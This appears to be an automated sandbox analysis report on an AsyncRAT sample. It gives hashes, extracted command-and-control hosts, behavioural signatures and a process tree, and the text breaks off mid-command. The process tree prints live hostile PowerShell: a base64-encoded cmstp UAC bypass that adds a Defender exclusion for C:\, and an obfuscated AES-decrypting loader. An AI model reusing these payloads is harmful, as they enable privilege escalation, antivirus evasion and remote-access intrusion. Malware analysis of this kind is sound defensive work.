Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-12-2024 19:31
Static task
static1
Behavioral task
behavioral1
Sample
upload.config.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
upload.config.exe
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
upload.config.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
upload.config.exe
Resource
win10ltsc2021-20241211-en
General
-
Target
upload.config.exe
-
Size
9.8MB
-
MD5
7a1eaa75ff1d1e83f564d0e5312a0930
-
SHA1
91988fcd3ffe2945d614f2141e0124f9ebcd6e01
-
SHA256
de47ee6f5098830b2569a1f0f889e021a9be2604093e3e157852060d307aa9f2
-
SHA512
b1d06ffc724e7a393387fb84900af0badf3a84bfe3ea0b2bed27d41f3114586e7b25b9661c2f23476b51b6cf9d5dcb36cf1d807c5441909b2a8315e4d40cc8c7
-
SSDEEP
49152:Plnb9f3/00iPuJXm6Os/CTu9VnAaZ+6AmX9mQXd0ujFFoyS+km9nmgMfq9+s6ewR:NnF00iPu
Malware Config
Extracted
asyncrat
0.5.8
Default
jt8iyre.localto.net:2101
jt8iyre.localto.net:55644
AbAUwI3PK3e3
-
delay
3
-
install
false
-
install_file
winserve.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral3/memory/4244-130-0x0000000006360000-0x0000000006372000-memory.dmp family_asyncrat -
Blocklisted process makes network request 7 IoCs
flow pid Process 44 4244 powershell.exe 49 4244 powershell.exe 50 4244 powershell.exe 51 4244 powershell.exe 52 4244 powershell.exe 53 4244 powershell.exe 54 4244 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 3328 powershell.exe 5092 powershell.exe 2524 powershell.exe 3644 powershell.exe 4244 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 756 AsyncRAT.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Kills process with taskkill 1 IoCs
pid Process 2860 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 3328 powershell.exe 3328 powershell.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 5092 powershell.exe 5092 powershell.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 756 AsyncRAT.exe 2524 powershell.exe 2524 powershell.exe 3644 powershell.exe 3644 powershell.exe 3644 powershell.exe 4244 powershell.exe 4244 powershell.exe 4244 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3328 powershell.exe Token: SeDebugPrivilege 5092 powershell.exe Token: SeDebugPrivilege 2860 taskkill.exe Token: SeDebugPrivilege 2524 powershell.exe Token: SeDebugPrivilege 3644 powershell.exe Token: SeIncreaseQuotaPrivilege 3644 powershell.exe Token: SeSecurityPrivilege 3644 powershell.exe Token: SeTakeOwnershipPrivilege 3644 powershell.exe Token: SeLoadDriverPrivilege 3644 powershell.exe Token: SeSystemProfilePrivilege 3644 powershell.exe Token: SeSystemtimePrivilege 3644 powershell.exe Token: SeProfSingleProcessPrivilege 3644 powershell.exe Token: SeIncBasePriorityPrivilege 3644 powershell.exe Token: SeCreatePagefilePrivilege 3644 powershell.exe Token: SeBackupPrivilege 3644 powershell.exe Token: SeRestorePrivilege 3644 powershell.exe Token: SeShutdownPrivilege 3644 powershell.exe Token: SeDebugPrivilege 3644 powershell.exe Token: SeSystemEnvironmentPrivilege 3644 powershell.exe Token: SeRemoteShutdownPrivilege 3644 powershell.exe Token: SeUndockPrivilege 3644 powershell.exe Token: SeManageVolumePrivilege 3644 powershell.exe Token: 33 3644 powershell.exe Token: 34 3644 powershell.exe Token: 35 3644 powershell.exe Token: 36 3644 powershell.exe Token: SeIncreaseQuotaPrivilege 3644 powershell.exe Token: SeSecurityPrivilege 3644 powershell.exe Token: SeTakeOwnershipPrivilege 3644 powershell.exe Token: SeLoadDriverPrivilege 3644 powershell.exe Token: SeSystemProfilePrivilege 3644 powershell.exe Token: SeSystemtimePrivilege 3644 powershell.exe Token: SeProfSingleProcessPrivilege 3644 powershell.exe Token: SeIncBasePriorityPrivilege 3644 powershell.exe Token: SeCreatePagefilePrivilege 3644 powershell.exe Token: SeBackupPrivilege 3644 powershell.exe Token: SeRestorePrivilege 3644 powershell.exe Token: SeShutdownPrivilege 3644 powershell.exe Token: SeDebugPrivilege 3644 powershell.exe Token: SeSystemEnvironmentPrivilege 3644 powershell.exe Token: SeRemoteShutdownPrivilege 3644 powershell.exe Token: SeUndockPrivilege 3644 powershell.exe Token: SeManageVolumePrivilege 3644 powershell.exe Token: 33 3644 powershell.exe Token: 34 3644 powershell.exe Token: 35 3644 powershell.exe Token: 36 3644 powershell.exe Token: SeIncreaseQuotaPrivilege 3644 powershell.exe Token: SeSecurityPrivilege 3644 powershell.exe Token: SeTakeOwnershipPrivilege 3644 powershell.exe Token: SeLoadDriverPrivilege 3644 powershell.exe Token: SeSystemProfilePrivilege 3644 powershell.exe Token: SeSystemtimePrivilege 3644 powershell.exe Token: SeProfSingleProcessPrivilege 3644 powershell.exe Token: SeIncBasePriorityPrivilege 3644 powershell.exe Token: SeCreatePagefilePrivilege 3644 powershell.exe Token: SeBackupPrivilege 3644 powershell.exe Token: SeRestorePrivilege 3644 powershell.exe Token: SeShutdownPrivilege 3644 powershell.exe Token: SeDebugPrivilege 3644 powershell.exe Token: SeSystemEnvironmentPrivilege 3644 powershell.exe Token: SeRemoteShutdownPrivilege 3644 powershell.exe Token: SeUndockPrivilege 3644 powershell.exe Token: SeManageVolumePrivilege 3644 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 756 AsyncRAT.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 756 AsyncRAT.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 3084 wrote to memory of 3664 3084 upload.config.exe 85 PID 3084 wrote to memory of 3664 3084 upload.config.exe 85 PID 3084 wrote to memory of 2612 3084 upload.config.exe 86 PID 3084 wrote to memory of 2612 3084 upload.config.exe 86 PID 3664 wrote to memory of 756 3664 cmd.exe 89 PID 3664 wrote to memory of 756 3664 cmd.exe 89 PID 2612 wrote to memory of 4284 2612 cmd.exe 90 PID 2612 wrote to memory of 4284 2612 cmd.exe 90 PID 4284 wrote to memory of 3328 4284 WScript.exe 91 PID 4284 wrote to memory of 3328 4284 WScript.exe 91 PID 3328 wrote to memory of 1528 3328 powershell.exe 95 PID 3328 wrote to memory of 1528 3328 powershell.exe 95 PID 1528 wrote to memory of 2664 1528 csc.exe 96 PID 1528 wrote to memory of 2664 1528 csc.exe 96 PID 3328 wrote to memory of 3036 3328 powershell.exe 97 PID 3328 wrote to memory of 3036 3328 powershell.exe 97 PID 4284 wrote to memory of 2808 4284 WScript.exe 122 PID 4284 wrote to memory of 2808 4284 WScript.exe 122 PID 2808 wrote to memory of 2524 2808 cmd.exe 124 PID 2808 wrote to memory of 2524 2808 cmd.exe 124 PID 2808 wrote to memory of 2524 2808 cmd.exe 124 PID 2524 wrote to memory of 3644 2524 powershell.exe 125 PID 2524 wrote to memory of 3644 2524 powershell.exe 125 PID 2524 wrote to memory of 3644 2524 powershell.exe 125 PID 2524 wrote to memory of 544 2524 powershell.exe 129 PID 2524 wrote to memory of 544 2524 powershell.exe 129 PID 2524 wrote to memory of 544 2524 powershell.exe 129 PID 544 wrote to memory of 636 544 WScript.exe 130 PID 544 wrote to memory of 636 544 WScript.exe 130 PID 544 wrote to memory of 636 544 WScript.exe 130 PID 636 wrote to memory of 4244 636 cmd.exe 132 PID 636 wrote to memory of 4244 636 cmd.exe 132 PID 636 wrote to memory of 4244 636 cmd.exe 132
Processes
-
C:\Users\Admin\AppData\Local\Temp\upload.config.exe"C:\Users\Admin\AppData\Local\Temp\upload.config.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\SYSTEM32\cmd.execmd /k start AsyncRAT.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Users\Admin\AppData\Local\Temp\AsyncRAT.exeAsyncRAT.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:756
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /k start 7254_output.vbs2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7254_output.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gcmFuZG9tWFlaLUludm9rZS1VQUMgewoKCnBhcmFtKAogICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkdHJ1ZSldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpFeGVjdXRhYmxlLAogCiAgICBbUGFyYW1ldGVyKCldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpDb21tYW5kCikKCiRyYW5kb21YWVpJbmZEYXRhID0gQCcKW3ZlcnNpb25dClNpZ25hdHVyZT0kY2hpY2FnbyQKQWR2YW5jZWRJTkY9Mi41CgpbRGVmYXVsdEluc3RhbGxdCkN1c3RvbURlc3RpbmF0aW9uPXJhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnMKUnVuUHJlU2V0dXBDb21tYW5kcz1yYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb24KCltyYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb25dCkxJTkUKdGFza2tpbGwgL0lNIGNtc3RwLmV4ZSAvRgoKW3JhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnNdCjQ5MDAwLDQ5MDAxPXJhbmRvbVhZWi1BbGxVU2VyX0xESURTZWN0aW9uLCA3CgpbcmFuZG9tWFlaLUFsbFVTZXJfTERJRFNlY3Rpb25dCiJIS0xNIiwgIlNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXEFwcCBQYXRoc1xDTU1HUjMyLkVYRSIsICJQcm9maWxlSW5zdGFsbFBhdGgiLCAiJVVuZXhwZWN0ZWRFcnJvciUiLCAiIgoKW1N0cmluZ3NdClNlcnZpY2VOYW1lPSJyYW5kb21YWVpWUE4iClNob3J0U3ZjTmFtZT0icmFuZG9tWFlaVlBOIgonQAoKJHJhbmRvbVhZWkNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7CnVzaW5nIFN5c3RlbS5UZXh0Owp1c2luZyBTeXN0ZW0uSU87CnVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsKdXNpbmcgU3lzdGVtLkNvbXBvbmVudE1vZGVsOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpwdWJsaWMgY2xhc3MgcmFuZG9tWFlaQ01TVFBCeXBhc3MKewogICAgW0RsbEltcG9ydCgiU2hlbGwzMi5kbGwiLCBDaGFyU2V0ID0gQ2hhclNldC5BdXRvLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0KICAgIHN0YXRpYyBleHRlcm4gSW50UHRyIFNoZWxsRXhlY3V0ZShJbnRQdHIgaHduZCwgc3RyaW5nIGxwT3BlcmF0aW9uLCBzdHJpbmcgbHBGaWxlLCBzdHJpbmcgbHBQYXJhbWV0ZXJzLCBzdHJpbmcgbHBEaXJlY3RvcnksIGludCBuU2hvd0NtZCk7CgogICAgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXQogICAgc3RhdGljIGV4dGVybiBJbnRQdHIgRmluZFdpbmRvdyhzdHJpbmcgbHBDbGFzc05hbWUsIHN0cmluZyBscFdpbmRvd05hbWUpOwoKICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0KICAgIHN0YXRpYyBleHRlcm4gYm9vbCBQb3N0TWVzc2FnZShJbnRQdHIgaFduZCwgdWludCBNc2csIGludCB3UGFyYW0sIGludCBsUGFyYW0pOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIEJpbmFyeVBhdGggPSAiYzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxjbXN0cC5leGUiOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIFNldEluZkZpbGUoc3RyaW5nIENvbW1hbmRUb0V4ZWN1dGUsIHN0cmluZyBJbmZEYXRhKQogICAgewogICAgICAgIFN0cmluZ0J1aWxkZXIgT3V0cHV0RmlsZSA9IG5ldyBTdHJpbmdCdWlsZGVyKCk7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIkM6XFx3aW5kb3dzXFx0ZW1wIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIlxcIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLlNwbGl0KENvbnZlcnQuVG9DaGFyKCIuIikpWzBdKTsKICAgICAgICBPdXRwdXRGaWxlLkFwcGVuZCgiLmluZiIpOwogICAgICAgIFN0cmluZ0J1aWxkZXIgbmV3SW5mRGF0YSA9IG5ldyBTdHJpbmdCdWlsZGVyKEluZkRhdGEpOwogICAgICAgIG5ld0luZkRhdGEuUmVwbGFjZSgiTElORSIsIENvbW1hbmRUb0V4ZWN1dGUpOwogICAgICAgIEZpbGUuV3JpdGVBbGxUZXh0KE91dHB1dEZpbGUuVG9TdHJpbmcoKSwgbmV3SW5mRGF0YS5Ub1N0cmluZygpKTsKICAgICAgICByZXR1cm4gT3V0cHV0RmlsZS5Ub1N0cmluZygpOwogICAgfQoKICAgIHB1YmxpYyBzdGF0aWMgYm9vbCByYW5kb21YWVpFeGVjdXRlKHN0cmluZyBDb21tYW5kVG9FeGVjdXRlLCBzdHJpbmcgSW5mRGF0YSkKICAgIHsKICAgICAgICBjb25zdCBpbnQgV01fU1lTS0VZRE9XTiA9IDB4MDEwMDsKICAgICAgICBjb25zdCBpbnQgVktfUkVUVVJOID0gMHgwRDsKCiAgICAgICAgU3RyaW5nQnVpbGRlciBJbmZGaWxlID0gbmV3IFN0cmluZ0J1aWxkZXIoKTsKICAgICAgICBJbmZGaWxlLkFwcGVuZChTZXRJbmZGaWxlKENvbW1hbmRUb0V4ZWN1dGUsIEluZkRhdGEpKTsKCiAgICAgICAgUHJvY2Vzc1N0YXJ0SW5mbyBzdGFydEluZm8gPSBuZXcgUHJvY2Vzc1N0YXJ0SW5mbyhCaW5hcnlQYXRoKTsKICAgICAgICBzdGFydEluZm8uQXJndW1lbnRzID0gIi9hdSAiICsgSW5mRmlsZS5Ub1N0cmluZygpOwogICAgICAgIHN0YXJ0SW5mby5XaW5kb3dTdHlsZSA9IFByb2Nlc3NXaW5kb3dTdHlsZS5IaWRkZW47ICAvLyBIaWRkZW4gd2luZG93CiAgICAgICAgSW50UHRyIGRwdHIgPSBNYXJzaGFsLkFsbG9jSEdsb2JhbCgxKTsKICAgICAgICBTaGVsbEV4ZWN1dGUoZHB0ciwgIiIsIEJpbmFyeVBhdGgsIHN0YXJ0SW5mby5Bcmd1bWVudHMsICIiLCAwKTsKCiAgICAgICAgVGhyZWFkLlNsZWVwKDMwMDApOwogICAgICAgIEludFB0ciBXaW5kb3dUb0ZpbmQgPSBGaW5kV2luZG93KG51bGwsICJyYW5kb21YWVpWUE4iKTsKCiAgICAgICAgUG9zdE1lc3NhZ2UoV2luZG93VG9GaW5kLCBXTV9TWVNLRVlET1dOLCBWS19SRVRVUk4sIDApOwogICAgICAgIFRocmVhZC5TbGVlcCg1MDAwKTsKICAgICAgICBGaWxlLkRlbGV0ZShJbmZGaWxlLlRvU3RyaW5nKCkpOwogICAgICAgIHJldHVybiB0cnVlOwogICAgfQp9CiJACgokcmFuZG9tWFlaQ29uc2VudFByb21wdCA9IChHZXQtSXRlbVByb3BlcnR5IEhLTE06XFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFBvbGljaWVzXFN5c3RlbSkuQ29uc2VudFByb21wdEJlaGF2aW9yQWRtaW4KJHJhbmRvbVhZWlNlY3VyZURlc2t0b3BQcm9tcHQgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xTeXN0ZW0pLlByb21wdE9uU2VjdXJlRGVza3RvcAppZiAoJHJhbmRvbVhZWkNvbnNlbnRQcm9tcHQgLUVxIDIgLWFuZCAkcmFuZG9tWFlaU2VjdXJlRGVza3RvcFByb21wdCAtRXEgMSkgewogICAgcmV0dXJuCn0KCnRyeSB7CiAgICAkcmFuZG9tWFlaVXNlciA9IFtTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eV06OkdldEN1cnJlbnQoKS5OYW1lCiAgICAkcmFuZG9tWFlaQWRtID0gR2V0LUxvY2FsR3JvdXBNZW1iZXIgLVNJRCBTLTEtNS0zMi01NDQgfCBXaGVyZS1PYmplY3QgeyAkXy5OYW1lIC1lcSAkcmFuZG9tWFlaVXNlciB9Cn0gY2F0Y2ggewogICAgJHJhbmRvbVhZWlVzZXIgPSBbU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbC5XaW5kb3dzSWRlbnRpdHldOjpHZXRDdXJyZW50KCkuTmFtZQogICAgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgPSAnUy0xLTUtMzItNTQ0JwogICAgJHJhbmRvbVhZWkFkbWluR3JvdXAgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9Hcm91cCB8IFdoZXJlLU9iamVjdCB7ICRfLlNJRCAtZXEgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgfQogICAgJHJhbmRvbVhZWk1lbWJlcnMgPSAkcmFuZG9tWFlaQWRtaW5Hcm91cC5HZXRSZWxhdGVkKCJXaW4zMl9Vc2VyQWNjb3VudCIpCiAgICAkcmFuZG9tWFlaTWVtYmVycyB8IEZvckVhY2gtT2JqZWN0IHsgaWYgKCRfLkNhcHRpb24gLWVxICRyYW5kb21YWVpVc2VyKSB7ICRyYW5kb21YWVpBZG0gPSAkdHJ1ZSB9IH0KfQoKaWYgKCEkcmFuZG9tWFlaQWRtKSB7CiAgICByZXR1cm4KfQoKdHJ5IHsKICAgIGlmICghW1N5c3RlbS5JTy5GaWxlXTo6RXhpc3RzKCRyYW5kb21YWVpFeGVjdXRhYmxlKSkgewogICAgICAgICRyYW5kb21YWVpFeCA9IChHZXQtQ29tbWFuZCAkcmFuZG9tWFlaRXhlY3V0YWJsZSkKICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXguU291cmNlKSkgewogICAgICAgICAgICAkcmFuZG9tWFlaRXhlY3V0YWJsZSA9ICRFeGVjdXRpb25Db250ZXh0LlNlc3Npb25TdGF0ZS5QYXRoLkdldFVucmVzb2x2ZWRQcm92aWRlclBhdGhGcm9tUFNQYXRoKCRyYW5kb21YWVpFeGVjdXRhYmxlKQogICAgICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXhlY3V0YWJsZSkpIHsKICAgICAgICAgICAgICAgIHJldHVybgogICAgICAgICAgICB9CiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgJHJhbmRvbVhZWkV4ZWN1dGFibGUgPSAoR2V0LUNvbW1hbmQgJHJhbmRvbVhZWkV4ZWN1dGFibGUpLk5hbWUKICAgICAgICB9CiAgICB9Cn0gY2F0Y2ggewogICAgcmV0dXJuCn0KCmlmICgkcmFuZG9tWFlaRXhlY3V0YWJsZS5Db250YWlucygicG93ZXJzaGVsbCIpKSB7CiAgICBpZiAoJHJhbmRvbVhZWkNvbW1hbmQgLW5lICIiKSB7CiAgICAgICAgJHJhbmRvbVhZWkZpbmFsID0gInBvd2Vyc2hlbGwgLVdpbmRvd1N0eWxlIEhpZGRlbiAtYyAiIiRyYW5kb21YWVpDb21tYW5kIiIiCiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlaWYgKCRyYW5kb21YWVpFeGVjdXRhYmxlLkNvbnRhaW5zKCJjbWQiKSkgewogICAgaWYgKCRyYW5kb21YWVpDb21tYW5kIC1uZSAiIikgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICJjbWQgL2MgIiIkcmFuZG9tWFlaQ29tbWFuZCIiIiAgIyBDaGFuZ2VkIHRvIC9jIHRvIGNsb3NlIHRoZSBjbWQgd2luZG93CiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlIHsKICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKfQoKZnVuY3Rpb24gcmFuZG9tWFlaRXhlY3V0ZSB7CiAgICB0cnkgewogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9IGNhdGNoIHsKICAgICAgICBBZGQtVHlwZSAkcmFuZG9tWFlaQ29kZQogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9CgogICAgaWYgKCRyYW5kb21YWVpSZXN1bHQpIHsKICAgICAgICByZXR1cm4KICAgIH0gZWxzZSB7CiAgICAgICAgcmV0dXJuCiAgICB9Cn0KCiRyYW5kb21YWVpQcm9jZXNzID0gKChHZXQtV21pT2JqZWN0IC1DbGFzcyB3aW4zMl9wcm9jZXNzKS5uYW1lIHwgU2VsZWN0LVN0cmluZyAiY21zdHAiIHwgU2VsZWN0LU9iamVjdCAqIC1GaXJzdCAxKS5QYXR0ZXJuCmlmICgkcmFuZG9tWFlaUHJvY2VzcyAtZXEgImNtc3RwIikgewogICAgdHJ5IHsKICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgImNtc3RwIiAtRm9yY2UKICAgICAgICByYW5kb21YWVpFeGVjdXRlCiAgICB9IGNhdGNoIHsKICAgICAgICByZXR1cm4KICAgIH0KfSBlbHNlIHsKICAgIHJhbmRvbVhZWkV4ZWN1dGUKfQp9CgojIEZ1bmN0aW9uIENhbGwKcmFuZG9tWFlaLUludm9rZS1VQUMgLXJhbmRvbVhZWkV4ZWN1dGFibGUgInBvd2Vyc2hlbGwiIC1yYW5kb21YWVpDb21tYW5kICIuKCdBZGQtTXBQJyArICdyZWZlcmVuY2UnKSAtRXhjbHVzaW9uUGF0aCBDOlwgLUV4Y2x1c2lvblByb2Nlc3MgcG93ZXJzaGVsbC5leGUi')))4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3328 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1bhio02a\1bhio02a.cmdline"5⤵
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD3EA.tmp" "c:\Users\Admin\AppData\Local\Temp\1bhio02a\CSCD25AD4CC2B1A4F18A9B2ACF24C8DA61.TMP"6⤵PID:2664
-
-
-
C:\windows\system32\cmstp.exe"C:\windows\system32\cmstp.exe" /au C:\windows\temp\3jm2yug4.inf5⤵PID:3036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ IEX '#EspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNKEspacoJUNK '.Replace('Espaco', ''); $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZTKslE6OdsXNtdeXo76Lj86BwdjokmZoErSJ0CEwRis='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ftBNGOmShOOXC7u6Pue69A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$ZjNXA=New-Object 